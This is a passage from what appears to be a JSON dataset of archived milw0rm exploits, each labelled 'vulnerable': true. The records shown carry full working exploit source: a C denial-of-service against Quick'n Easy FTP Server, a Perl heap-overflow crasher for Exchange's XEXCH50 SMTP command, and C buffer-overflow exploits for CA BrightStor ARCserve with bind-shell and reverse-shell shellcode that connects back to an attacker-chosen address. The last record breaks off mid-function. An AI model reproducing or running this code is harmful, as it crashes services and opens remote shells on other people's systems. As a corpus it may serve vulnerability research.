\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\";\n\n\n\n\n\n\n\nint main(int argc, char *argv[])\n\n{\n\n       fprintf(stdout, \"Quick'n Easy FTP Server 3.0 (pro and lite) Remote D.o.S Exploit by Kozan\\n\");\n\n       fprintf(stdout, \"Discovered by: matiteman\\n\");\n\n       fprintf(stdout, \"Exploit Coded by: Kozan\\n\");\n\n       fprintf(stdout, \"Credits to ATmaCA, matiteman\\n\\n\");\n\n       fprintf(stdout, \"www.spyinstructors.com - kozan@spyinstructors.com\\n\");\n\n\n\n       if(argc<2)\n\n       {\n\n               fprintf(stderr, \"\\n\\nUsage: %s [Target IP]\\n\\n\", argv[0]);\n\n               return -1;\n\n       }\n\n       WSADATA wsaData;\n\n       SOCKET sock;\n\n\n\n       if( WSAStartup(0x0101,&wsaData) < 0 )\n\n       {\n\n               fprintf(stderr, \"Winsock error!\\n\");\n\n               return -1;\n\n       }\n\n\n\n       sock = socket(AF_INET,SOCK_STREAM,0);\n\n       if( sock == -1 )\n\n       {\n\n               fprintf(stderr, \"Socket error!\\n\");\n\n               return -1;\n\n       }\n\n\n\n       struct sockaddr_in addr;\n\n\n\n       addr.sin_family = AF_INET;\n\n       addr.sin_port = htons(21);\n\n       addr.sin_addr.s_addr = inet_addr(argv[1]);\n\n       memset(&(addr.sin_zero), '\\0', 8);\n\n\n\n       fprintf(stdout, \"Connecting to %s ...\\n\", argv[1]);\n\n\n\n       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )\n\n       {\n\n               fprintf(stderr, \"Connection failed!\\n\");\n\n               closesocket(sock);\n\n               return -1;\n\n       }\n\n\n\n       fprintf(stdout, \"Connected.\\n\");\n\n\n\n       char *pszBuf1 = (char *)malloc(sizeof(Buff)+10);\n\n\n\n       wsprintf(pszBuf1, \"USER %s\\r\\n\", Buff);\n\n\n\n       fprintf(stdout, \"Sending B.o.F USER command ...\\n\");\n\n\n\n       if( send(sock,pszBuf1,strlen(pszBuf1),0) == -1 )\n\n       {\n\n               fprintf(stderr, \"Could not sent!\\n\");\n\n               closesocket(sock);\n\n               return -1;\n\n       }\n\n\n\n       fprintf(stdout, \"String sent...\\n\");\n\n       Sleep(500);\n\n       fprintf(stdout, \"Please wait, checking if the server crashed or not...\\n\");\n\n\n\n       if( send(sock,pszBuf1,strlen(pszBuf1),0) == -1 )\n\n       {\n\n               fprintf(stdout, \"Server Crashed!!!\\n\");\n\n               closesocket(sock);\n\n               return -1;\n\n       }\n\n\n\n       fprintf(stdout, \"Server is still alive. Maybe it is not vulnerable or allready patched!\\n\");\n\n       closesocket(sock);\n\n       WSACleanup();\n\n\n\n       return 0;\n\n}\n\n\n\n// milw0rm.com [2005-08-02]",
690        "vulnerable": true
691    },
692    {
693        "exploit_id": 113,
694        "content": "#!/usr/bin/perl -w\n\n##################\n\n\n\n##\n\n# ms03-046.pl - hdm metasploit com\n\n# This vulnerability allows a remote unauthenticated user to overwrite big chunks \n\n# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is \n\n# non-trivial; even though the entire buffer is binary safe (even nulls) and can be \n\n# just about any size, the actual code that crashes varies widely with each request. \n\n# During the analysis process, numerous combinations of request size, concurrent \n\n# requests, pre-allocations, and alternate trigger routes were examined and not a \n\n# single duplicate of location and data offset was discovered. Hopefully the magic \n\n# combination of data, size, and setup will be found to allow this bug to be reliably \n\n# exploited.\n\n\n\n# minor bugfix: look for 354 Send binary data\n\n\n\nuse strict;\n\nuse IO::Socket;\n\n\n\nmy $host = shift() || usage();\n\nmy $mode = shift() || \"CHECK\";\n\nmy $port = 25;\n\n\n\n\n\nif (uc($mode) eq \"CHECK\") { check() }\n\nif (uc($mode) eq \"CRASH\") { crash() }\n\n\n\nusage();\n\n\n\n\n\nsub check\n\n{\n\n    my $s = SMTP($host, $port);\n\n    if (! $s)\n\n    {\n\n        print \"[*] Error establishing connection to SMTP service.\\n\";\n\n        exit(0);\n\n    }\n\n\n\n    print $s \"XEXCH50 2 2\\r\\n\";\n\n    my $res = <$s>;    \n\n    close ($s);\n\n\n\n    # a patched server only allows XEXCH50 after NTLM authentication\n\n    if ($res !~ /354 Send binary/i)\n\n    {\n\n        print \"[*] This server has been patched or is not vulnerable.\\n\";\n\n        exit(0);\n\n    }\n\n\n\n    print \"[*] This system is vulnerable: $host:$port\\n\";\n\n\n\n    exit(0);\n\n}\n\n\n\n\n\nsub crash\n\n{\n\n    my $s = SMTP($host, $port);\n\n    if (! $s)\n\n    {\n\n        print \"[*] Error establishing connection to SMTP service.\\n\";\n\n        exit(0);\n\n    }\n\n\n\n    # the negative value allows us to overwrite random heap bits\n\n    print $s \"XEXCH50 -1 2\\r\\n\";\n\n    my $res = <$s>;    \n\n\n\n    # a patched server only allows XEXCH50 after NTLM authentication\n\n    if ($res !~ /354 Send binary/i)\n\n    {\n\n        print \"[*] This server has been patched or is not vulnerable.\\n\";\n\n        exit(0);\n\n    }\n\n\n\n    print \"[*] Sending massive heap-smashing string...\\n\";\n\n    print $s (\"META\" x 16384);\n\n\n\n    # sometimes a second connection is required to trigger the crash\n\n    $s = SMTP($host, $port);\n\n\n\n    exit(0);\n\n}\n\n\n\n\n\nsub usage \n\n{\n\n    print STDERR \"Usage: $0 <host> [CHECK|CRASH]\\n\";\n\n    exit(0);\n\n\n\n}\n\n\n\nsub SMTP\n\n{\n\n    my ($host, $port) = @_;\n\n    my $s = IO::Socket::INET->new\n\n    (\n\n        PeerAddr => $host,\n\n        PeerPort => $port,\n\n        Proto    => \"tcp\"\n\n    ) || return(undef);\n\n\n\n    my $r = <$s>;\n\n    return undef if !$r;\n\n    \n\n    if ($r !~ /Microsoft/)\n\n    {\n\n        chomp($r);\n\n        print STDERR \"[*] This does not look like an exchange server: $r\\n\";\n\n        return(undef);\n\n    }\n\n    \n\n    print $s \"HELO X\\r\\n\";\n\n    $r = <$s>;\n\n    return undef if !$r;   \n\n\n\n    print $s \"MAIL FROM: DoS\\r\\n\";\n\n    $r = <$s>;\n\n    return undef if !$r;\n\n    \n\n    print $s \"RCPT TO: Administrator\\r\\n\";\n\n    $r = <$s>;\n\n    return undef if !$r;\n\n    \n\n    return($s); \n\n}\n\n\n\n\n\n# milw0rm.com [2003-10-22]",
695        "vulnerable": true
696    },
697    {
698        "exploit_id": 1130,
699        "content": "/*\n\n * CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe\n\n *\n\n * cybertronic[at]gmx[dot]net\n\n *\n\n */\n\n\n\n#include <stdio.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <netdb.h>\n\n\n\n#define PORT 6070\n\n\n\nunsigned char bindshell[] =\n\n\"\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\x89\\xff\\xff\\xff\\x81\\x36\\x80\\xbf\\x32\"\n\n\"\\x94\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\"\n\n\"\\x03\\x53\\x06\\x1f\\x74\\x57\\x75\\x95\\x80\\xbf\\xbb\\x92\\x7f\\x89\\x5a\\x1a\"\n\n\"\\xce\\xb1\\xde\\x7c\\xe1\\xbe\\x32\\x94\\x09\\xf9\\x3a\\x6b\\xb6\\xd7\\x9f\\x4d\"\n\n\"\\x85\\x71\\xda\\xc6\\x81\\xbf\\x32\\x1d\\xc6\\xb3\\x5a\\xf8\\xec\\xbf\\x32\\xfc\"\n\n\"\\xb3\\x8d\\x1c\\xf0\\xe8\\xc8\\x41\\xa6\\xdf\\xeb\\xcd\\xc2\\x88\\x36\\x74\\x90\"\n\n\"\\x7f\\x89\\x5a\\xe6\\x7e\\x0c\\x24\\x7c\\xad\\xbe\\x32\\x94\\x09\\xf9\\x22\\x6b\"\n\n\"\\xb6\\xd7\\x4c\\x4c\\x62\\xcc\\xda\\x8a\\x81\\xbf\\x32\\x1d\\xc6\\xab\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xf9\\x79\\x7c\\x84\\xda\\x9a\\x81\\xbf\\x32\\x1d\\xc6\\xa7\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xeb\\x9d\\x75\\x12\\xda\\x6a\\x80\\xbf\\x32\\x1d\\xc6\\xa3\\xcd\\xe2\"\n\n\"\\x84\\xd7\\x96\\x8e\\xf0\\x78\\xda\\x7a\\x80\\xbf\\x32\\x1d\\xc6\\x9f\\xcd\\xe2\"\n\n\"\\x84\\xd7\\x96\\x39\\xae\\x56\\xda\\x4a\\x80\\xbf\\x32\\x1d\\xc6\\x9b\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xd7\\xdd\\x06\\xf6\\xda\\x5a\\x80\\xbf\\x32\\x1d\\xc6\\x97\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xd5\\xed\\x46\\xc6\\xda\\x2a\\x80\\xbf\\x32\\x1d\\xc6\\x93\\x01\\x6b\"\n\n\"\\x01\\x53\\xa2\\x95\\x80\\xbf\\x66\\xfc\\x81\\xbe\\x32\\x94\\x7f\\xe9\\x2a\\xc4\"\n\n\"\\xd0\\xef\\x62\\xd4\\xd0\\xff\\x62\\x6b\\xd6\\xa3\\xb9\\x4c\\xd7\\xe8\\x5a\\x96\"\n\n\"\\x80\\xae\\x6e\\x1f\\x4c\\xd5\\x24\\xc5\\xd3\\x40\\x64\\xb4\\xd7\\xec\\xcd\\xc2\"\n\n\"\\xa4\\xe8\\x63\\xc7\\x7f\\xe9\\x1a\\x1f\\x50\\xd7\\x57\\xec\\xe5\\xbf\\x5a\\xf7\"\n\n\"\\xed\\xdb\\x1c\\x1d\\xe6\\x8f\\xb1\\x78\\xd4\\x32\\x0e\\xb0\\xb3\\x7f\\x01\\x5d\"\n\n\"\\x03\\x7e\\x27\\x3f\\x62\\x42\\xf4\\xd0\\xa4\\xaf\\x76\\x6a\\xc4\\x9b\\x0f\\x1d\"\n\n\"\\xd4\\x9b\\x7a\\x1d\\xd4\\x9b\\x7e\\x1d\\xd4\\x9b\\x62\\x19\\xc4\\x9b\\x22\\xc0\"\n\n\"\\xd0\\xee\\x63\\xc5\\xea\\xbe\\x63\\xc5\\x7f\\xc9\\x02\\xc5\\x7f\\xe9\\x22\\x1f\"\n\n\"\\x4c\\xd5\\xcd\\x6b\\xb1\\x40\\x64\\x98\\x0b\\x77\\x65\\x6b\\xd6\\x93\\xcd\\xc2\"\n\n\"\\x94\\xea\\x64\\xf0\\x21\\x8f\\x32\\x94\\x80\\x3a\\xf2\\xec\\x8c\\x34\\x72\\x98\"\n\n\"\\x0b\\xcf\\x2e\\x39\\x0b\\xd7\\x3a\\x7f\\x89\\x34\\x72\\xa0\\x0b\\x17\\x8a\\x94\"\n\n\"\\x80\\xbf\\xb9\\x51\\xde\\xe2\\xf0\\x90\\x80\\xec\\x67\\xc2\\xd7\\x34\\x5e\\xb0\"\n\n\"\\x98\\x34\\x77\\xa8\\x0b\\xeb\\x37\\xec\\x83\\x6a\\xb9\\xde\\x98\\x34\\x68\\xb4\"\n\n\"\\x83\\x62\\xd1\\xa6\\xc9\\x34\\x06\\x1f\\x83\\x4a\\x01\\x6b\\x7c\\x8c\\xf2\\x38\"\n\n\"\\xba\\x7b\\x46\\x93\\x41\\x70\\x3f\\x97\\x78\\x54\\xc0\\xaf\\xfc\\x9b\\x26\\xe1\"\n\n\"\\x61\\x34\\x68\\xb0\\x83\\x62\\x54\\x1f\\x8c\\xf4\\xb9\\xce\\x9c\\xbc\\xef\\x1f\"\n\n\"\\x84\\x34\\x31\\x51\\x6b\\xbd\\x01\\x54\\x0b\\x6a\\x6d\\xca\\xdd\\xe4\\xf0\\x90\"\n\n\"\\x80\\x2f\\xa2\\x04\";\n\n\n\nunsigned char reverseshell[] =\n\n\"\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9\\x25\\x01\\x80\\x34\\x0B\\x99\\xE2\\xFA\"\n\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\\x70\\x62\\x99\\x99\\x99\\xC6\\xFD\\x38\\xA9\"\n\n\"\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\"\n\n\"\\x9D\\xC0\\x71\\x02\\x99\\x99\\x99\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\"\n\n\"\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\\x71\\xF3\\x9D\\xC0\\x71\\x1B\\x99\\x99\\x99\"\n\n\"\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\"\n\n\"\\x89\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\\xD9\\xC9\\x66\\xCF\\x8D\\x12\\x41\\xF1\\xE6\"\n\n\"\\x99\\x99\\x98\\xF1\\x9B\\x99\\x9D\\x4B\\x12\\x55\\xF3\\x89\\xC8\\xCA\\x66\\xCF\"\n\n\"\\x81\\x1C\\x59\\xEC\\xD3\\xF1\\xFA\\xF4\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\"\n\n\"\\x14\\xA5\\xBD\\xF3\\x8C\\xC0\\x32\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\"\n\n\"\\xBD\\xA4\\x10\\xC5\\xBD\\xD1\\x10\\xC5\\xBD\\xD5\\x10\\xC5\\xBD\\xC9\\x14\\xDD\"\n\n\"\\xBD\\x89\\xCD\\xC9\\xC8\\xC8\\xC8\\xF3\\x98\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\"\n\n\"\\xCF\\x9D\\x12\\x55\\xF3\\x66\\x66\\xA8\\x66\\xCF\\x91\\xCA\\x66\\xCF\\x85\\x66\"\n\n\"\\xCF\\x95\\xC8\\xCF\\x12\\xDC\\xA5\\x12\\xCD\\xB1\\xE1\\x9A\\x4C\\xCB\\x12\\xEB\"\n\n\"\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\\x89\\xA3\"\n\n\"\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\\x7E\\xC3\"\n\n\"\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x9A\\x44\\x12\\x9D\"\n\n\"\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\x99\\x66\\x66\\x66\\x17\\xD7\\x97\\x75\"\n\n\"\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\\x57\\x76\\x57\\x79\\xF9\\x52\\x74\\x65\\xA2\"\n\n\"\\x40\\x90\\x6C\\x34\\x75\\x60\\x33\\xF9\\x7E\\xE0\\x5F\\xE0\";\n\n\n\nvoid\n\nexploit ( int s, unsigned long cbip, unsigned short cbport, int option )\n\n{\n\n\tunsigned long pushesp = 0x20c0c1ab;\n\n\tchar buffer[3289];\n\n\n\n\tbzero ( &buffer, sizeof ( buffer ) );\n\n\tmemset ( buffer, 0x41, sizeof ( buffer ) - 1 );\n\n\tmemcpy ( buffer + 1337, \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", 6 );\n\n\tmemcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );\n\n\tmemcpy ( buffer + 3172, \"\\xe9\\xd0\\xf8\\xff\\xff\", 5 );\n\n\n\n\tif ( option == 0 )\n\n\t{\n\n\t\tmemcpy ( &reverseshell[111], &cbip, 4);\n\n\t\tmemcpy ( &reverseshell[118], &cbport, 2);\n\n\t\tmemcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );\n\n\t}\n\n\telse\n\n\t\tmemcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );\n\n\n\n\tprintf ( \"attacking with %u bytes...\", strlen ( buffer ) );\n\n\twrite ( s, buffer, strlen ( buffer ) );\n\n\tprintf ( \"done!\\n\" );\n\n\tclose ( s );\n\n}\n\n\n\nint\n\nmain ( int argc, char* argv[] )\n\n{\n\n\tint s;\n\n\tunsigned long cbip;\n\n\tunsigned short cbport;\n\n\tstruct sockaddr_in remote_addr;\n\n\tstruct hostent* host_addr;\n\n\n\n\tif ( argc != 2 )\n\n\t\tif ( argc != 4 )\n\n\t\t\t{ fprintf ( stderr, \"Usage\\n-----\\n[bindshell] %s <ip>\\n[reverseshell] %s <ip> <cbip> <cbport>\\n\", argv[0], argv[0] ); exit ( 1 ); }\n\n\n\n\tif ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )\n\n\t\t{ fprintf ( stderr, \"Cannot resolve hostname: %s\\n\", argv[1] ); exit ( 1 ); }\n\n\n\n\tremote_addr.sin_family = AF_INET;\n\n\tremote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );\n\n\tremote_addr.sin_port   = htons ( PORT );\n\n\n\n\ts = socket ( AF_INET, SOCK_STREAM, 0 );\n\n\tprintf ( \"connecting to %s:%u...\", argv[1], PORT );\n\n\tif ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )\n\n\t\t{ printf ( \"failed!\\n\" ); exit ( 1 ); }\n\n\tprintf ( \"ok!\\n\" );\n\n\n\n\tif ( argc == 4 )\n\n\t{\n\n\t\tcbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;\n\n\t\tcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;\n\n\t\texploit ( s, cbip, cbport, 0 );\n\n\t}\n\n\telse\n\n\t\texploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );\n\n}\n\n\n\n// milw0rm.com [2005-08-03]",
700        "vulnerable": true
701    },
702    {
703        "exploit_id": 1131,
704        "content": "/*\n\n * CA BrightStor ARCserve Backup Buffer Overflow - dsconfig.exe\n\n *\n\n * cybertronic[at]gmx[dot]net\n\n *\n\n */\n\n\n\n#include <stdio.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <netdb.h>\n\n\n\n#define PORT\t41523\n\n\n\nunsigned char bindshell[] =\n\n\"\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\x89\\xff\\xff\\xff\\x81\\x36\\x80\\xbf\\x32\"\n\n\"\\x94\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\"\n\n\"\\x03\\x53\\x06\\x1f\\x74\\x57\\x75\\x95\\x80\\xbf\\xbb\\x92\\x7f\\x89\\x5a\\x1a\"\n\n\"\\xce\\xb1\\xde\\x7c\\xe1\\xbe\\x32\\x94\\x09\\xf9\\x3a\\x6b\\xb6\\xd7\\x9f\\x4d\"\n\n\"\\x85\\x71\\xda\\xc6\\x81\\xbf\\x32\\x1d\\xc6\\xb3\\x5a\\xf8\\xec\\xbf\\x32\\xfc\"\n\n\"\\xb3\\x8d\\x1c\\xf0\\xe8\\xc8\\x41\\xa6\\xdf\\xeb\\xcd\\xc2\\x88\\x36\\x74\\x90\"\n\n\"\\x7f\\x89\\x5a\\xe6\\x7e\\x0c\\x24\\x7c\\xad\\xbe\\x32\\x94\\x09\\xf9\\x22\\x6b\"\n\n\"\\xb6\\xd7\\x4c\\x4c\\x62\\xcc\\xda\\x8a\\x81\\xbf\\x32\\x1d\\xc6\\xab\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xf9\\x79\\x7c\\x84\\xda\\x9a\\x81\\xbf\\x32\\x1d\\xc6\\xa7\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xeb\\x9d\\x75\\x12\\xda\\x6a\\x80\\xbf\\x32\\x1d\\xc6\\xa3\\xcd\\xe2\"\n\n\"\\x84\\xd7\\x96\\x8e\\xf0\\x78\\xda\\x7a\\x80\\xbf\\x32\\x1d\\xc6\\x9f\\xcd\\xe2\"\n\n\"\\x84\\xd7\\x96\\x39\\xae\\x56\\xda\\x4a\\x80\\xbf\\x32\\x1d\\xc6\\x9b\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xd7\\xdd\\x06\\xf6\\xda\\x5a\\x80\\xbf\\x32\\x1d\\xc6\\x97\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xd5\\xed\\x46\\xc6\\xda\\x2a\\x80\\xbf\\x32\\x1d\\xc6\\x93\\x01\\x6b\"\n\n\"\\x01\\x53\\xa2\\x95\\x80\\xbf\\x66\\xfc\\x81\\xbe\\x32\\x94\\x7f\\xe9\\x2a\\xc4\"\n\n\"\\xd0\\xef\\x62\\xd4\\xd0\\xff\\x62\\x6b\\xd6\\xa3\\xb9\\x4c\\xd7\\xe8\\x5a\\x96\"\n\n\"\\x80\\xae\\x6e\\x1f\\x4c\\xd5\\x24\\xc5\\xd3\\x40\\x64\\xb4\\xd7\\xec\\xcd\\xc2\"\n\n\"\\xa4\\xe8\\x63\\xc7\\x7f\\xe9\\x1a\\x1f\\x50\\xd7\\x57\\xec\\xe5\\xbf\\x5a\\xf7\"\n\n\"\\xed\\xdb\\x1c\\x1d\\xe6\\x8f\\xb1\\x78\\xd4\\x32\\x0e\\xb0\\xb3\\x7f\\x01\\x5d\"\n\n\"\\x03\\x7e\\x27\\x3f\\x62\\x42\\xf4\\xd0\\xa4\\xaf\\x76\\x6a\\xc4\\x9b\\x0f\\x1d\"\n\n\"\\xd4\\x9b\\x7a\\x1d\\xd4\\x9b\\x7e\\x1d\\xd4\\x9b\\x62\\x19\\xc4\\x9b\\x22\\xc0\"\n\n\"\\xd0\\xee\\x63\\xc5\\xea\\xbe\\x63\\xc5\\x7f\\xc9\\x02\\xc5\\x7f\\xe9\\x22\\x1f\"\n\n\"\\x4c\\xd5\\xcd\\x6b\\xb1\\x40\\x64\\x98\\x0b\\x77\\x65\\x6b\\xd6\\x93\\xcd\\xc2\"\n\n\"\\x94\\xea\\x64\\xf0\\x21\\x8f\\x32\\x94\\x80\\x3a\\xf2\\xec\\x8c\\x34\\x72\\x98\"\n\n\"\\x0b\\xcf\\x2e\\x39\\x0b\\xd7\\x3a\\x7f\\x89\\x34\\x72\\xa0\\x0b\\x17\\x8a\\x94\"\n\n\"\\x80\\xbf\\xb9\\x51\\xde\\xe2\\xf0\\x90\\x80\\xec\\x67\\xc2\\xd7\\x34\\x5e\\xb0\"\n\n\"\\x98\\x34\\x77\\xa8\\x0b\\xeb\\x37\\xec\\x83\\x6a\\xb9\\xde\\x98\\x34\\x68\\xb4\"\n\n\"\\x83\\x62\\xd1\\xa6\\xc9\\x34\\x06\\x1f\\x83\\x4a\\x01\\x6b\\x7c\\x8c\\xf2\\x38\"\n\n\"\\xba\\x7b\\x46\\x93\\x41\\x70\\x3f\\x97\\x78\\x54\\xc0\\xaf\\xfc\\x9b\\x26\\xe1\"\n\n\"\\x61\\x34\\x68\\xb0\\x83\\x62\\x54\\x1f\\x8c\\xf4\\xb9\\xce\\x9c\\xbc\\xef\\x1f\"\n\n\"\\x84\\x34\\x31\\x51\\x6b\\xbd\\x01\\x54\\x0b\\x6a\\x6d\\xca\\xdd\\xe4\\xf0\\x90\"\n\n\"\\x80\\x2f\\xa2\\x04\";\n\n\n\nunsigned char reverseshell[] =\n\n\"\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9\\x25\\x01\\x80\\x34\\x0B\\x99\\xE2\\xFA\"\n\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\\x70\\x62\\x99\\x99\\x99\\xC6\\xFD\\x38\\xA9\"\n\n\"\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\"\n\n\"\\x9D\\xC0\\x71\\x02\\x99\\x99\\x99\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\"\n\n\"\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\\x71\\xF3\\x9D\\xC0\\x71\\x1B\\x99\\x99\\x99\"\n\n\"\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\"\n\n\"\\x89\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\\xD9\\xC9\\x66\\xCF\\x8D\\x12\\x41\\xF1\\xE6\"\n\n\"\\x99\\x99\\x98\\xF1\\x9B\\x99\\x9D\\x4B\\x12\\x55\\xF3\\x89\\xC8\\xCA\\x66\\xCF\"\n\n\"\\x81\\x1C\\x59\\xEC\\xD3\\xF1\\xFA\\xF4\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\"\n\n\"\\x14\\xA5\\xBD\\xF3\\x8C\\xC0\\x32\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\"\n\n\"\\xBD\\xA4\\x10\\xC5\\xBD\\xD1\\x10\\xC5\\xBD\\xD5\\x10\\xC5\\xBD\\xC9\\x14\\xDD\"\n\n\"\\xBD\\x89\\xCD\\xC9\\xC8\\xC8\\xC8\\xF3\\x98\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\"\n\n\"\\xCF\\x9D\\x12\\x55\\xF3\\x66\\x66\\xA8\\x66\\xCF\\x91\\xCA\\x66\\xCF\\x85\\x66\"\n\n\"\\xCF\\x95\\xC8\\xCF\\x12\\xDC\\xA5\\x12\\xCD\\xB1\\xE1\\x9A\\x4C\\xCB\\x12\\xEB\"\n\n\"\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\\x89\\xA3\"\n\n\"\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\\x7E\\xC3\"\n\n\"\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x9A\\x44\\x12\\x9D\"\n\n\"\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\x99\\x66\\x66\\x66\\x17\\xD7\\x97\\x75\"\n\n\"\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\\x57\\x76\\x57\\x79\\xF9\\x52\\x74\\x65\\xA2\"\n\n\"\\x40\\x90\\x6C\\x34\\x75\\x60\\x33\\xF9\\x7E\\xE0\\x5F\\xE0\";\n\n\n\nvoid\n\nexploit ( int s, unsigned long cbip, unsigned short cbport, int option )\n\n{\n\n\tchar buffer[4129];\n\n\tunsigned long poppopret = 0x23805714;\n\n\n\n\tbzero ( &buffer, sizeof ( buffer ) );\n\n\tmemset ( buffer, 0x41, sizeof ( buffer ) - 1 );\n\n\n\n\tbuffer[0] = 0x9b;\n\n\tbuffer[1] = 0x53; //S\n\n\tbuffer[2] = 0x45; //E\n\n\tbuffer[3] = 0x52; //R\n\n\tbuffer[4] = 0x56; //V\n\n\tbuffer[5] = 0x49; //I\n\n\tbuffer[6] = 0x43; //C\n\n\tbuffer[7] = 0x45; //E\n\n\tbuffer[8] = 0x50; //P\n\n\tbuffer[9] = 0x43; //C\n\n\tbuffer[10] = 0x18;\n\n\tbuffer[11] = 0x01;\n\n\tbuffer[12] = 0x02;\n\n\tbuffer[13] = 0x03;\n\n\tbuffer[14] = 0x04;\n\n\tbuffer[15] = 0x53; //S\n\n\tbuffer[16] = 0x45; //E\n\n\tbuffer[17] = 0x52; //R\n\n\tbuffer[18] = 0x56; //V\n\n\tbuffer[19] = 0x49; //I\n\n\tbuffer[20] = 0x43; //C\n\n\tbuffer[21] = 0x45; //E\n\n\tbuffer[22] = 0x50; //P\n\n\tbuffer[23] = 0x43; //C\n\n\tbuffer[24] = 0x01;\n\n\tbuffer[25] = 0x0c;\n\n\tbuffer[26] = 0x6c;\n\n\tbuffer[27] = 0x93;\n\n\tbuffer[28] = 0xce;\n\n\tbuffer[29] = 0x18;\n\n\tbuffer[30] = 0x18;\n\n\n\n\tmemcpy ( buffer + 1056, \"\\xeb\\x06\", 2 );\n\n\tmemcpy ( buffer + 1060, \"\\x14\\x57\\x80\\x23\", 4 );\n\n\tif ( option == 